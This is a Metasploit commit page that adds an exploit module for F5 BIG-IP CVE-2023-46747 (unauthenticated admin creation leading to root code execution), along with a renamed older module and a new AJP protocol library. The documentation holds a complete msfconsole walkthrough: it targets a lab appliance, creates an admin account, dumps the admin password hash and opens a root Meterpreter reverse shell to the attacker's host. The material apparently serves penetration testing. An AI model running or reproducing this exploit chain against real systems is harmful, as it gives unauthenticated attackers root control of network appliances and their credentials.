Land #18497, Add Exploit For F5 CVE-2023-46747

This module exploits a flaw in F5s BIG-IP Traffic Management User Interface (TMUI) that enables an external, unauthenticated attacker to create an administrative user. The attacker can then use the admin user to execute arbitrary code in the context of the root user.
rapid7 · Nov 2, 2023 · 17f7d5c · 17f7d5c
2 parents df47814 + 27d86be
commit 17f7d5c
Show file tree

Hide file tree

Showing 5 changed files with 501 additions and 6 deletions.
diff --git a/...s/exploit/linux/http/f5_bigip_tmui_rce.md → ...x/http/f5_bigip_tmui_rce_cve_2020_5902.md b/...s/exploit/linux/http/f5_bigip_tmui_rce.md → ...x/http/f5_bigip_tmui_rce_cve_2020_5902.md
@@ -52,11 +52,11 @@ Defaults to `/tmp`.
 ### F5 BIG-IP 14.1.2 in VMware Fusion
 
 ```
-msf5 > use exploit/linux/http/f5_bigip_tmui_rce
+msf5 > use exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902
 [*] Using configured payload linux/x64/meterpreter/reverse_tcp
-msf5 exploit(linux/http/f5_bigip_tmui_rce) > options
+msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > options
 
-Module options (exploit/linux/http/f5_bigip_tmui_rce):
+Module options (exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902):
 
    Name       Current Setting  Required  Description
    ----       ---------------  --------  -----------
@@ -87,11 +87,11 @@ Exploit target:
    1   Linux Dropper
 
 
-msf5 exploit(linux/http/f5_bigip_tmui_rce) > set rhosts 172.16.249.179
+msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > set rhosts 172.16.249.179
 rhosts => 172.16.249.179
-msf5 exploit(linux/http/f5_bigip_tmui_rce) > set lhost 172.16.249.1
+msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > set lhost 172.16.249.1
 lhost => 172.16.249.1
-msf5 exploit(linux/http/f5_bigip_tmui_rce) > run
+msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > run
 
 [*] Started reverse TCP handler on 172.16.249.1:4444
 [*] Executing automatic check (disable AutoCheck to override)

diff --git a/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce_cve_2023_46747.md b/documentation/modules/exploit/linux/http/f5_bigip_tmui_rce_cve_2023_46747.md
@@ -0,0 +1,77 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a flaw in F5's BIG-IP Traffic Management User Interface (TMUI) that enables an external,
+unauthenticated attacker to create an administrative user. Once the user is created, the module uses the new account to
+execute a command payload. Both the exploit and check methods automatically delete any temporary accounts that are
+created.
+
+Tested against the VMware OVA release of 16.1.2.1-0.0.10 and 17.0.0.1-0.0.4.
+
+### Setup
+
+Download BIGIP-17.0.0.1-0.0.4.ALL-vmware.ova and import it into your desired virtualization software.
+
+The target does not need to be licensed to be vulnerable.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/f5_bigip_tmui_rce_cve_2023_46747`
+4. Set the `RHOST`, `PAYLOAD` and payload-related options
+5. Do: `run`
+6. You should get a shell.
+
+## Targets
+
+### Command
+
+This executes an OS command on the target device.
+
+## Options
+
+## Scenarios
+
+### F5 BIG-IP 17.0.0.1-0.0.4
+
+```
+msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set RHOSTS 192.168.159.32
+RHOSTS => 192.168.159.32
+msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
+PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set LHOST 192.168.159.128 
+LHOST => 192.168.159.128
+msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > check
+[+] 192.168.159.32:443 - The target is vulnerable.
+msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[+] Admin user was created successfully. Credentials: UyPzjB - qu0k7MxIzIDlvS
+[+] Retrieved the admin hash: $6$gquMefr5$HGA8j7xLzHq2cfZOSudg6g6vETPpHthWOSWJtCtYd1sWRoNGCLnAQKbRvQoRm1QgEm8fC3HfH5tLI9KSSr8M10
+[*] Obtained login token: 4TAZKYHLZCHPQX3FC47VWNSEUA
+[*] Sending stage (24768 bytes) to 192.168.159.32
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.32:35438) at 2023-11-01 16:36:04 -0400
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : f5test2.home.lan
+OS           : Linux 3.10.0-862.14.4.el7.ve.x86_64 #1 SMP Thu Jul 14 23:41:24 PDT 2022
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter > pwd
+/var/service/restjavad
+meterpreter > background 
+[*] Backgrounding session 1...
+msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > creds
+Credentials
+===========
+
+host            origin          service                   public  private                                                                                              realm  private_type        JtR Format    cracked_password
+----            ------          -------                   ------  -------                                                                                              -----  ------------        ----------    ----------------
+192.168.159.32  192.168.159.32  443/tcp (F5 BIG-IP TMUI)  admin   $6$gquMefr5$HGA8j7xLzHq2cfZOSudg6g6vETPpHthWOSWJtCtYd1sWRoNGCLnAQKbRvQoRm1QgEm8fC3HfH5t (TRUNCATED)         Nonreplayable hash  sha512,crypt  
+
+msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > 
+```
diff --git a/lib/rex/proto/apache_j_p.rb b/lib/rex/proto/apache_j_p.rb
@@ -0,0 +1,127 @@
+# -*- coding: binary -*-
+
+require 'bindata'
+
+# @see: https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html
+module Rex::Proto::ApacheJP
+  class ApacheJPBoolean < BinData::Primitive
+    endian  :big
+
+    uint8   :data
+
+    def get
+      self.data != 0
+    end
+
+    def set(v)
+      self.data = v ? 1 : 0
+    end
+  end
+
+  class ApacheJPString < BinData::Primitive
+    endian  :big
+
+    uint16  :len, value: -> { data.length }
+    stringz :data
+
+    def get
+      self.data
+    end
+
+    def set(v)
+      self.data = v
+    end
+  end
+
+  class ApacheJPReqHeaderName < BinData::Primitive
+    COMMON_HEADERS = %w{ accept accept-charset accept-encoding accept-language authorization connection content-type content-length cookie cookie2 host pragma referer user-agent }
+    endian :big
+
+    uint16  :len_or_code
+    stringz :data, onlyif: -> { len_or_code < 0xa000 }
+
+    def get
+      if len_or_code >= 0xa000
+        COMMON_HEADERS[(len_or_code.to_i & 0xff) - 1]
+      else
+        self.data
+      end
+    end
+
+    def set(v)
+      if (idx = COMMON_HEADERS.index(v))
+        self.len_or_code = 0xa000 | (idx + 1)
+      else
+        raise RuntimeError if v.length >= 0xa000
+
+        self.len_or_code = v.length
+        self.data = v
+      end
+    end
+  end
+
+  class ApacheJPRequestHeader < BinData::Record
+    endian :big
+
+    apache_jp_req_header_name :header_name
+    apache_jp_string          :header_value
+  end
+
+  class ApacheJPRequestAttribute < BinData::Record
+    CODE_CONTEXT = 1
+    CODE_SERVLET_PATH = 2
+    CODE_REMOTE_USER = 3
+    CODE_AUTH_TYPE = 4
+    CODE_QUERY_STRING = 5
+    CODE_JVM_ROUTE = 6
+    CODE_SSL_CERT = 7
+    CODE_SSL_CIPHER = 8
+    CODE_SSL_SESSION = 9
+    CODE_REQ_ATTRIBUTE = 10
+    CODE_TERMINATOR = 0xff
+
+    endian :big
+
+    uint8            :code
+    apache_jp_string :attribute_value, onlyif: -> { code != CODE_TERMINATOR }
+  end
+
+  class ApacheJPForwardRequest < BinData::Record
+    HTTP_METHOD_OPTIONS = 1
+    HTTP_METHOD_GET = 2
+    HTTP_METHOD_HEAD = 3
+    HTTP_METHOD_POST = 4
+    HTTP_METHOD_PUT = 5
+    HTTP_METHOD_DELETE = 6
+    HTTP_METHOD_TRACE = 7
+    HTTP_METHOD_PROPFIND = 8
+    HTTP_METHOD_PROPPATCH = 9
+    HTTP_METHOD_MKCOL = 10
+    HTTP_METHOD_COPY = 11
+    HTTP_METHOD_MOVE = 12
+    HTTP_METHOD_LOCK = 13
+    HTTP_METHOD_UNLOCK = 14
+    HTTP_METHOD_ACL = 15
+    HTTP_METHOD_REPORT = 16
+    HTTP_METHOD_VERSION_CONTROL = 17
+    HTTP_METHOD_CHECKIN = 18
+    HTTP_METHOD_CHECKOUT = 19
+    HTTP_METHOD_UNCHECKOUT = 20
+    HTTP_METHOD_SEARCH = 21
+
+    endian :big
+
+    uint8             :prefix_code, value: 2
+    uint8             :http_method
+    apache_jp_string  :protocol, initial_value: 'HTTP/1.1'
+    apache_jp_string  :req_uri
+    apache_jp_string  :remote_addr
+    apache_jp_string  :remote_host
+    apache_jp_string  :server_name
+    uint16            :server_port, initial_value: -> { is_ssl ? 80 : 443 }
+    apache_jp_boolean :is_ssl, initial_value: false
+    uint16            :num_headers, initial_value: -> { headers.length }
+    array             :headers, type: :apache_jp_request_header, initial_length: :num_headers
+    array             :attributes, type: :apache_jp_request_attribute, read_until: -> { element.code == ApacheJPRequestAttribute::TERMINATOR }
+  end
+end
diff --git a/.../exploits/linux/http/f5_bigip_tmui_rce.rb → ...x/http/f5_bigip_tmui_rce_cve_2020_5902.rb b/.../exploits/linux/http/f5_bigip_tmui_rce.rb → ...x/http/f5_bigip_tmui_rce_cve_2020_5902.rb
@@ -11,6 +11,8 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::Deprecated
+  moved_from 'exploit/linux/http/f5_bigip_tmui_rce'
 
   def initialize(info = {})
     super(